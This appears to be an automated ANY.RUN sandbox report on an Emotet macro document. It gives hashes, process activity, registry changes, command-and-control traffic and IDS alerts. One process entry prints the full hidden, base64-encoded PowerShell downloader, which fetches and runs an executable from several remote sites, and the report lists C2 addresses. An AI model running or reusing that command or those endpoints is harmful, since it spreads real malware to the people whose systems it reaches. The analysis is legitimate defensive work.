File name:

X.doc

Full analysis: https://app.any.run/tasks/e73929a0-590e-465c-aba9-544f799acadf
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: December 07, 2019, 00:19:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Quia rem et., Author: Deniz Benninger, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 5 17:53:00 2019, Last Saved Time/Date: Thu Dec 5 17:53:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 337, Security: 0
MD5:

6F667CFF32EC075F0FBDB33EF6CD2016

SHA1:

4ABC63E3FAF07810397873811F7D093F801C786E

SHA256:

77094CD1BD3D8D429AD652583B4CDB2A101608AE698729BFFBA8468B0BAC06E6

SSDEEP:

6144:sWwmP3WbeJzUO62k4qtGiL3HJkWyD7b1bvDT:sWwmP3WbeJzUO6bQitkB7bB7T

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 493.exe (PID: 3772)
      • 493.exe (PID: 2428)
      • serialfunc.exe (PID: 3976)
      • serialfunc.exe (PID: 3628)

    • Emotet process was detected

      • 493.exe (PID: 2428)

    • EMOTET was detected

      • serialfunc.exe (PID: 3628)

    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 3628)

    • Connects to CnC server

      • serialfunc.exe (PID: 3628)

  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3792)

    • Creates files in the user directory

      • powershell.exe (PID: 3792)

    • PowerShell script executed

      • powershell.exe (PID: 3792)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3792)
      • 493.exe (PID: 2428)

    • Application launched itself

      • 493.exe (PID: 3772)

    • Starts itself from another location

      • 493.exe (PID: 2428)

    • Connects to unusual port

      • serialfunc.exe (PID: 3628)

    • Connects to SMTP port

      • serialfunc.exe (PID: 3628)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 640)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 640)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Quia rem et.
Subject: -
Author: Deniz Benninger
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:05 17:53:00
ModifyDate: 2019:12:05 17:53:00
Pages: 1
Words: 58
Characters: 337
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 394
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 493.exe no specs #EMOTET 493.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
640"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\X.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2428--956a31ecC:\Users\admin\493.exe
493.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\493.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
3628--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\appdata\local\serialfunc\serialfunc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
3772"C:\Users\admin\493.exe" C:\Users\admin\493.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\493.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
3792powershell -w hidden -en JABaAGEAYgBwAHIAYwBqAGYAPQAnAEEAYQBvAGUAZwBzAHUAagBmAGoAJwA7ACQAVgBpAG0AcQBoAGEAdgB3ACAAPQAgACcANAA5ADMAJwA7ACQAUgBlAHIAYwBnAHkAeAB3AD0AJwBNAGQAagBpAGkAcAB0AGUAagB6AGIAYQB1ACcAOwAkAEsAawB4AGgAdgBuAHAAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAVgBpAG0AcQBoAGEAdgB3ACsAJwAuAGUAeABlACcAOwAkAEsAcABmAGwAcgB4AG4AdwB5AD0AJwBBAGEAYwBnAGMAbQBwAGMAYgBiACcAOwAkAFkAZABjAGIAbQB2AHAAcgBxAGcAbQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAQgBjAEwAaQBFAE4AdAA7ACQASQBnAGIAZwBxAGQAcwByAD0AJwBoAHQAdABwAHMAOgAvAC8AaABhAGIAZQByAC4AcgBhAG4AawBoAGkAZwBoAC4AYwBhAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGoAbQBkAHYALQBkAG4AcgBnADAALQAyADkANwAvACoAaAB0AHQAcAA6AC8ALwBzAGcAcwB1AG4AZgBsAG8AdwBlAHIALgBlAGQAdQAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAGkAbgBjAGwAdQBkAGUAcwAvAFoAdwB6AFIAcgBvAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AcwB0AHUAZABpAG8AdAB1AGwAbABpAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBrADAAMQAzAC0AcgBoAGoAegB5AGYAZQAtADEAOQAxADYAMQAzADYANAA3AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGMAdQBiAHIAYQAuAGUAbgBzAC4AZQBkAHUALgBiAHIALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ARgBUAGEAUABwAE4AVABYAC8AKgBoAHQAdABwAHMAOgAvAC8AYQBjAGEAZABlAG0AaQBhAG0AbwBuAHMAdABlAHIALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB5AHMAeQBPAEoARABZAGcAbgAvACcALgAiAFMAUABgAEwASQB0ACIAKAAnACoAJwApADsAJABNAHUAbQBmAGMAZABhAHIAawB4AD0AJwBKAHMAawB0AGIAegBnAGwAeQB5AHAAdABiACcAOwBmAG8AcgBlAGEAYwBoACgAJABCAGMAbQB0AGEAYQBvAHgAZwB4AHMAaABmACAAaQBuACAAJABJAGcAYgBnAHEAZABzAHIAKQB7AHQAcgB5AHsAJABZAGQAYwBiAG0AdgBwAHIAcQBnAG0ALgAiAEQAbwBgAFcAbgBMAG8AYABBAGQAYABGAEkATABFACIAKAAkAEIAYwBtAHQAYQBhAG8AeABnAHgAcwBoAGYALAAgACQASwBrAHgAaAB2AG4AcAB6ACkAOwAkAE8AbABzAHMAZwBuAGYAcwByAGUAcgBrAHMAPQAnAEEAZABnAGcAdwBqAGIAdgBhAGMAdQBrACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBrAHgAaAB2AG4AcAB6ACkALgAiAEwAYABlAGAATgBnAHQASAAiACAALQBnAGUAIAAyADgANgA1ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAFQAIgAoACQASwBrAHgAaAB2AG4AcAB6ACkAOwAkAFMAZAB6AGcAbQBnAHIAZQBuAD0AJwBaAHMAcABqAG8AbwBvAGYAeQAnADsAYgByAGUAYQBrADsAJABWAGcAbgBtAHAAcwBxAG0AYwB1AGYAPQAnAE8AbABtAGwAbQBpAHkAcwB4AHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwBxAG4AZwB3AGYAcABzAGYAaQA9ACcAWgByAHkAbwBhAGYAawB1AGYAYwB2AGQAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3976"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe493.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\appdata\local\serialfunc\serialfunc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
Total events
2 281
Read events
1 448
Write events
707
Delete events
126

Modification events

(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:i1;
Value:
69313B0080020000010000000000000000000000
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(640) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1334247486
Executable files
2
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
640WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA969.tmp.cvr
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0B5C21B.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59349D60.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC03DE1.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D963CA6E.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91771B97.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89C990AC.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FACE0BD.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FC7B79A.wmf
MD5:
SHA256:
640WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE55AED3.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
434
DNS requests
281
Threats
161

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3628
serialfunc.exe
POST
200
92.119.123.10:8080
http://92.119.123.10:8080/j09g7BH5rzItV
unknown
binary
138 Kb
malicious
3628
serialfunc.exe
POST
200
172.90.70.168:443
http://172.90.70.168:443/zDwi5Ybu
US
binary
1.38 Mb
malicious
3628
serialfunc.exe
POST
200
149.202.153.251:8080
http://149.202.153.251:8080/E8PGmm
FR
binary
684 Kb
malicious
3628
serialfunc.exe
POST
92.119.123.10:8080
http://92.119.123.10:8080/AJ506QCvsmuDbNpYI
unknown
malicious
3628
serialfunc.exe
POST
200
92.119.123.10:8080
http://92.119.123.10:8080/LXJBRyrvnrWp
unknown
binary
148 b
malicious
POST
82.145.43.153:8080
http://82.145.43.153:8080/rpCJ
GB
malicious
3628
serialfunc.exe
POST
149.202.153.251:8080
http://149.202.153.251:8080/ytjng9cd4nAwLkpoU
FR
malicious
3628
serialfunc.exe
POST
200
92.119.123.10:8080
http://92.119.123.10:8080/XqZiK
unknown
binary
138 Kb
malicious
3628
serialfunc.exe
POST
149.202.153.251:8080
http://149.202.153.251:8080/JfWBPbVrcaPutvmU
FR
malicious
3628
serialfunc.exe
POST
200
82.145.43.153:8080
http://82.145.43.153:8080/MCbD8G5
GB
binary
684 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3628
serialfunc.exe
172.90.70.168:443
Time Warner Cable Internet LLC
US
malicious
3792
powershell.exe
18.212.128.71:443
haber.rankhigh.ca
US
unknown
3628
serialfunc.exe
148.81.188.196:465
poczta.vizja.pl
Naukowa I Akademicka Siec Komputerowa Instytut Badawczy
PL
unknown
3628
serialfunc.exe
92.119.123.10:8080
malicious
3628
serialfunc.exe
199.79.63.31:465
mail.expervia.in
PDR
US
suspicious
3628
serialfunc.exe
195.201.105.237:587
mail.gmsworldwide.com
Awanti Ltd.
RU
unknown
3628
serialfunc.exe
212.227.15.177:587
pop.1und1.com
1&1 Internet SE
DE
unknown
3628
serialfunc.exe
197.221.1.10:25
mail.hyundaiodn.co.za
HETZNER
ZA
unknown
3628
serialfunc.exe
79.124.90.37:587
mail.website.bg
Telepoint Ltd
BG
unknown
3628
serialfunc.exe
82.57.200.129:587
in.alice.it
Telecom Italia
IT
unknown

DNS requests

Domain
IP
Reputation
haber.rankhigh.ca
  • 18.212.128.71
unknown
pop.bizmail.yahoo.com
  • 188.125.73.25
  • 217.146.190.246
  • 217.146.190.238
shared
mail.hyundaiodn.co.za
  • 197.221.1.10
unknown
poczta.vizja.pl
  • 148.81.188.196
unknown
mail.website.bg
  • 79.124.90.37
unknown
mail.expervia.in
  • 199.79.63.31
suspicious
imap.1und1.de
  • 212.227.15.171
  • 212.227.15.188
shared
pop.capeletting.com
  • 188.40.0.100
unknown
imap.gmail.com
  • 64.233.167.108
  • 64.233.167.109
shared
mail.gmsworldwide.com
  • 195.201.105.237
unknown

Threats

PID
Process
Class
Message
3628
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
3628
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
3628
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3628
serialfunc.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
3628
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3628
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3628
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
3628
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
3628
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3628
serialfunc.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
No debug info